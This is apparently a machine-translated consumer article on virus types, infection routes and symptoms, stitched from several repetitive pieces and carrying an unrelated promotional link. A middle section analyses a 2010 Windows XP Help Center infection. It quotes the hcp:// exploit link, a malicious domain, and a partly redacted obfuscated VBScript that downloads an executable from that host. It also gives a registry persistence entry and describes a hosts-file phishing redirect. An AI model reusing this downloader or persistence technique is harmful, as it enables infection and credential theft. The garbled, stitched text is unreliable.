Virus protection! What are Trojans, Spies, Rootkits? How to protect your computer from viruses? Computer viruses. Types, types, ways of infection Installing VMware Workstation Player to create and work with virtual machines
Hello again.
Topic of today's article. Types of computer viruses, principles of their work, ways of infection with computer viruses.
What are computer viruses in general.
A computer virus is a specially written program or an assembly of algorithms that are written with the purpose of: joking, harming someone's computer, gaining access to your computer, to intercept passwords or extort money. Viruses can self-copy and infect your programs and files with malicious code, as well as boot sectors.
Types of malware.
Malware can be divided into two main types.
Viruses and worms.
Viruses- spread through a malicious file that you could download on the Internet, or may end up on a pirate disk, or often transfer them via Skype under the guise of useful programs (I noticed that schoolchildren often come across the latter, they are supposedly given a mod for a game or cheats, but in fact may be a virus that can harm).
The virus introduces its code to one of the programs, or is masked by a separate program in the place where users usually do not enter (folders with the operating system, hidden system folders).
The virus cannot start on its own until you launch the infected program yourself.
Worms already infect many files on your computer, for example, all exe files, system files, boot sectors, etc.
Worms most often penetrate the system themselves, using the vulnerabilities of your OS, your browser, or a certain program.
They can penetrate chats, communication programs such as skype, icq can be distributed via e-mail.
They can also be on sites, and using the vulnerability of your browser to penetrate your system.
Worms can spread over the local network, if one of the computers on the network becomes infected, it can spread to other computers, infecting all files in its path.
Worms try to write for the most popular programs. For example, now the most popular browser is "Chrome", so scammers will try to write for it, and make malicious code on sites for it. Because it is often more interesting to infect thousands of users who use a popular program than a hundred with an unpopular program. Although chrome is constantly improving security.
The best protection against network worms This is to update your programs and your operating system. Many neglect the updates, which they often regret.
Several years ago I noticed the following worm.
But he obviously did not get through the Internet, but most likely through a pirated disc. The essence of his work was as follows - he allegedly created a copy of each folder on a computer or on a USB flash drive. But in fact, he did not create a similar folder but an exe file. When you click on such an exe file, it spreads even more throughout the system. And now you just got rid of it, you come to a friend with a flash drive, throw off the music from him, and you come back with a flash drive infected with such a worm and you had to take it out again. I don't know if this virus caused any other harm to the system, but soon this virus ceased to exist.
The main types of viruses.
In fact, there are many types and varieties of computer threats. And it is simply impossible to consider everything. Therefore, we will consider the most common recently and the most unpleasant.
Viruses are:
— File- are located in an infected file, are activated when the user turns on this program, they cannot activate themselves.
— Boot- can be loaded when loading windows, hitting startup, when inserting a USB flash drive or the like.
-
Macro viruses
- these are various scripts that can be located on the site, can send them to you by mail or in Word and Excel documents, perform certain functions inherent in the computer. Exploit vulnerabilities in your programs.
Types of viruses.
-Trojans
- Spies
- Ransomware
- Vandals
- Rootkits
- Botnet
- Keyloggers
These are the most common types of threats that you may encounter. But in reality there are many more.
Some viruses can even combine and contain several types of these threats at once.
- Trojans... The name comes from the Trojan horse. It penetrates your computer under the guise of harmless programs, then it can open access to your computer or send your passwords to the owner.
Recently, such Trojans have become widespread as stealers. They can steal saved passwords in your browser, in game mail clients. Immediately after launch, it copies your passwords and sends your passwords to email or hosting to an attacker. It remains for him to collect your data, then they are either sold or used for their own purposes.
- Spyware track user actions. What sites the user visits or what does the user do on his computer.
- Ransomware... These include Winlockers. The program completely, or completely blocks access to the computer and requires money for unlocking, for example, put on an account or so on. In no case, if you get caught up in this, it is not worth sending money. The computer will not be unlocked for you, and you will lose money. You have a direct road to the Drweb website, where you can find how to unlock many winlockers by entering a certain code or performing some actions. Some winlockers can disappear for example in a day.
- Vandals can block access to antivirus sites and access to antivirus and many other programs.
- Rootkits(rootkit) - viruses are hybrids. They can contain various viruses. They can gain access to your pc, and a person will have complete access to your computer, and they can merge into the kernel level of your OS. Came from the world of Unix systems. They can mask various viruses, collect data about the computer and about all computer processes.
- Botnet quite an unpleasant thing. Botnets are huge networks of infected "zombie" computers that can be used for DDoS sites and other cyber attacks using infected computers. This type is very common and difficult to detect, even antivirus companies may not be aware of their existence for a long time. Many people can be infected with them and not even suspect about it. You are no exception, and maybe even I.
— Keyloggers(keylogger) - keyloggers. They intercept everything that you enter from the keyboard (sites, passwords) and send them to the owner.
Ways of infection with computer viruses.
The main routes of infection.
- Operating system vulnerability.
— Browser vulnerability
- Antivirus quality is lame
- User stupidity
- Removable media.
OS vulnerability- no matter how hard you try to rivet protection for the OS, security holes are found over time. Most viruses are written under windows as it is the most popular operating system. The best defense is to keep your operating system up to date and try to use a newer version.
Browsers- This is due to browser vulnerabilities, especially if they are old again. It is also treated with frequent updates. There may also be problems if you download browser plugins from third-party resources.
Antivirus- free antiviruses that have less functionality than paid ones. Although paid ones do not give 100 results in defense and misfire. But it is desirable to have at least a free antivirus. I already wrote about free antiviruses in this one.
User stupidity- clicks on banners, click on suspicious links from letters, etc., install software from suspicious places.
Removable media- viruses can be installed automatically from infected and specially prepared flash drives and other removable media. Not so long ago, the world heard about the BadUSB vulnerability.
https://avi1.ru/ - you can buy very inexpensive promotion on social networks on this site. You will also receive really profitable offers for purchasing resources on your pages.
Types of infected objects.
Files- Infect your programs, system and regular files.
Boot sectors- memory resident viruses. As the name implies, they infect the boot sectors of the computer, assign their code to the computer's startup and are launched when the operating system starts. Sometimes they are well disguised, which is difficult to remove from startup.
Macro commands- Word documents, excel and the like. Using macros and vulnerabilities in Microsoft office tools injects its malicious code into your operating system.
Signs of a computer virus infection.
Not the fact that when some of these signs appear, it means the presence of a virus in the system. But if they are available, it is recommended to check your computer with an antivirus or contact a specialist.
One of the common signs is this is a strong overload of the computer... When your computer is running slowly, although you seem to have nothing turned on, programs that can heavily load the computer. But if you have an antivirus, notice the antiviruses themselves load the computer very well. And in the absence of such software that can load, then more likely there are viruses. In general, I advise you to reduce the number of startup programs to start at startup.
can also be one of the signs of infection.
But not all viruses can put a heavy load on the system, some are almost difficult to notice changes.
System errors. Drivers stop working, some programs start to work incorrectly, or often crash with an error, but before, for example, this was not noticed. Or programs start to reboot frequently. Of course, this happens because of antiviruses, for example, the antivirus deleted it by mistake, considering the system file to be malicious, or deleted a really infected file but it was associated with the system files of the program and the removal entailed such errors.
The appearance of ads in browsers or even banners start to appear on the desktop.
The appearance of non-standard sounds when the computer is running (squeaks, clicks for no apparent reason, and the like).
The CD / DVD drive opens by itself, or just starts to read the disc, although the disc is not there.
Turning on or off the computer for a long time.
Hijacking your passwords. If you notice that various spam is being sent on your behalf, from your mailbox or social network page, as the likelihood that a virus penetrated your computer and passed the passwords to the owner, if you notice this, I recommend checking with an antivirus without fail (although it is not a fact that this is the case) the attacker got your password).
Frequent access to the hard disk... Each computer has an indicator that blinks when using various programs or when copying, downloading, moving files. For example, your computer is just turned on, but no programs are used, but the indicator starts blinking frequently, supposedly programs are being used. These are already viruses at the level of the hard disk.
Here, in fact, we examined the computer viruses that you may encounter on the Internet. But in fact, there are many times more of them, and it is not possible to fully protect yourself, except perhaps not to use the Internet, not to buy discs and not to turn on the computer at all.
From my childhood I was tormented by the question: "How does a computer get infected with viruses." Finally I found out, felt it for myself. Why not tell the world how this very entertaining process actually goes.
In order not to write a manual on infection, otherwise a lot of people will use it, God forbid, so I will delete some parts of the scripts.
Already everyone, probably, is fed up with the phrases about the "leakiness" of MS Windows, but, nevertheless, it remains the most widespread system on the planet Earth. Or maybe the system is so full of holes because of its prevalence.
And now, the attack was carried out on one of the vulnerabilities of the Windows XP system, namely the Windows Help Center.
The beginning, as usual, was a long time ago (already in 2010), you can read about this on the very well-known resource xakep.ru (at the very bottom of the page).
It all started simply.
IE issued a request to open a program from the tjyre .info resource. Obviously a virus! But it’s interesting !!
Go to the site http://tjyre.info does not give any information, except that the site is under construction (at the time of posting the post, it just does not work at all, apparently pinched it).
How do I know what was meant for me on my computer? Elementary - you need to consider where the link leads.
hcp: // services / search? query = anything & topic = hcp: //system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% % A ... %% A %% A %% A ..% 5C ..% 5Csysinfomain.htm% u003fsvr =
As my ignorance tells me, the link to the virus file is hidden behind numbers.
Through simple transformations, it turns out that under the numbers there is a copying of a script with the name of the l .vbs file to the system folder of my computer, and its subsequent launch.
The address where the script is located on the network:
http://tjyre.info/games/hcp_vbs.php?f=17
The file that opens contains the following text:
« w = 3000: x = 200: y = 1: z = false: a = " http://tjyre.info/u.php?e=7&f=17": Set e = Createobject (StrReverse (" tcejbOmetsySeliF.gnitpircS ")): Set f = e.GetSpecialFolder (2): b = f &" \ exe.ex2 ": b = Replace (b, Month (" 2010-02 -16 ")," e "): OT =" GET ": Set c = CreateObject (StrReverse (" PTTHLMX.2LMXSM ")): Set d = CreateObject (StrReverse (" maertS.BDODA ")) ... Removed for stupid reasons ...g =o.GetFile (b):g.Delete»
The text is quite simple:
we see the date 02/16/2010 (it turns out that some kind of masking of the virus is carried out by date, they still adopted it, that it is necessary to mask it)
we see the commands turned inside out (using the reverse), with the help of which the virus file flies into our computer.
Safely sit down fresh readme.exe. What does this guest bring us? Surely a lot of fun.
Launching readme. exe was very successfully blocked by the program antiwinlocker ... For which she is honored and praised. But since I still want to see what happens, the defenders will have to be asked to retire for a while.
The first launch of the virus was not remarkable, which is understandable, the virus penetrated and hid until the next boot.
Reboot and silence again. Mystery!!
We'll have to look in secret corners.
Find the lsass.exe file (imitating the system process) in the C: \ Documents and Settings \ Admin \ Application Data folder.
In the registry, respectively, we find the key:
"userinit" = "C: \\ WINDOWS \\ system32 \\ userinit.exe, C: \\ Documents and Settings \\ Admin \\ Application Data \\ lsass.exe" as expected.
But that is not all!
In the folder "C: \ WINDOWS \ system32 \ drivers \ etc" there is a magic hosts file, to which the virus adds a dozen magic lines (please see the WHOLE hosts file):
These lines are used to redirect from sites classmates and vkontakte to a very specific site, and also arrange a complete bummer for Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).
What do we see when we go to the villain's site? We see the main page of classmates, but if you enter your login and password, they will go straight to the "villain". And if you click on some link, we get a very cool request for "account validation". Moreover, the text clearly says: " The service is not available to subscribers in some regions of Megafon". Such a serious approach to business that I did not immediately enter the meaning of the phrase.
Actually treat viruses, it is not a very difficult operation to pay the specialists a lot of money for this work. To protect your computer from viruses, or in case of infection, you can return your computer to a "healthy" state by removing malicious programs yourself, by choosing a good antivirus program and observing some rules. Take at least two of the most important ones: The first is to regularly update the anti-virus databases. The second is to completely scan your computer for viruses once a month.
So, with that, I think it's clear that malware removal is done with antivirus software. They are paid and free, I told about free methods in the following article:
And now what is a malware or a virus in another way?
Computer virus or malware is a program, the main purpose of which is: causing harm to the computer, damage to user data, theft or deletion of personal information, deterioration of the computer and much more.
Today malware can be classified into several types according to their effect on the computer.
- Classic viruses.
- Trojan horses.
- Spies.
- Rootkits.
- Adware.
Let's take a closer look at each type of malware.
Classic viruses Are malicious programs that can infect a computer, for example, via the Internet. And the essence of such viruses is self-propagation. Such viruses copy themselves, copy files and folders that are on the infected computer. They do this with the aim of infecting the data so that their recovery is impossible in the future. This virus tries to damage all data on the computer, entering its code into all files, starting with the system files and ending with the user's personal data. Most often, the salvation, on such an infected computer, is.
Trojan horse Is a serious type of virus. Trojans are written by cybercriminals for a specific purpose, for example, stealing information from computers, or stealing passwords, and so on.
The Trojan is divided into two parts. The first part, called the Server, is kept by the attacker, and the second, the Client part, is distributed to all possible corners of the Internet and in other places. If the client part of the malicious program enters a computer, this PC becomes infected and the Trojan starts sending various information to the attacker in disguise.
The Trojan can also perform various operations on the computer at the request of the server (the attacker), steal passwords, infect documents and files with malicious code.
Spies, are somewhat similar to Trojans. But they have the main difference, and it lies in the fact that spies do not harm the files of the system and the user. Spyware quietly get into the computer and spy. They can steal passwords or even save absolutely everything that you enter from the keyboard.
Spyware is the most intelligent type of virus and can even send files from an infected computer. A spy knows a lot of information about an infected PC: what system is installed, what antivirus do you use, what browser you use the Internet from, what programs are installed on the computer, and so on. Spyware is one of the most dangerous malware out there.
Rootkits Are not viruses in and of themselves. But rootkits are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer was infected with a spyware virus at the same time as a rootkit. And the rootkit will try to hide the spy from your antivirus and operating system. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, trojans) from the eyes of our antivirus for a long time!
Adware Is another type of malicious software. This is a less dangerous program, and its essence is to spin ads on your computer in all sorts of ways in different places. Adware does not do any harm and does not infect or spoil files. But you also need to protect yourself from this type of virus.
These are the types malware exists. To protect your computer from viruses, we need a good antivirus. I talked about that in another article, and now we will continue the topic of describing viruses and protection schemes for your computer.
Previously, viruses did not have a specific purpose, they were written for interest and the developer did not set a specific goal. Now viruses are the most complex algorithms, the essence of which is most often theft of money and data. Trojans are usually designed only to steal passwords and other important data.
By the way, whether your computer was attacked by viruses can be distinguished by some signs:
- Programs do not work correctly or stop working altogether.
- The computer began to slow down, work slowly.
- Some files get corrupted, refuse to open.
Very often, such signs can become a sign of a computer virus infection, but fortunately not always.
It should be noted that most often one particular virus can infect different types of files. Therefore, even after the computer has been cured of a strong virus attack, the formatting of the partitions will be the most correct.
Antivirus programs will help you to protect yourself from viruses, as I said above. Today, anti-virus programs have features that are enough to repel almost all malicious programs that spread on the Internet. But for maximum virus protection an important role is played by a properly selected and configured antivirus program for full "combat" performance. I recommend that you read the article about. But if you don’t have time, I’ll name the best anti-virus programs for you right here. Today, these are:
- Kaspersky
- Avast
- Dr.Web
- NOD32
I think there is plenty to choose from.
Good luck and excellent virus protection.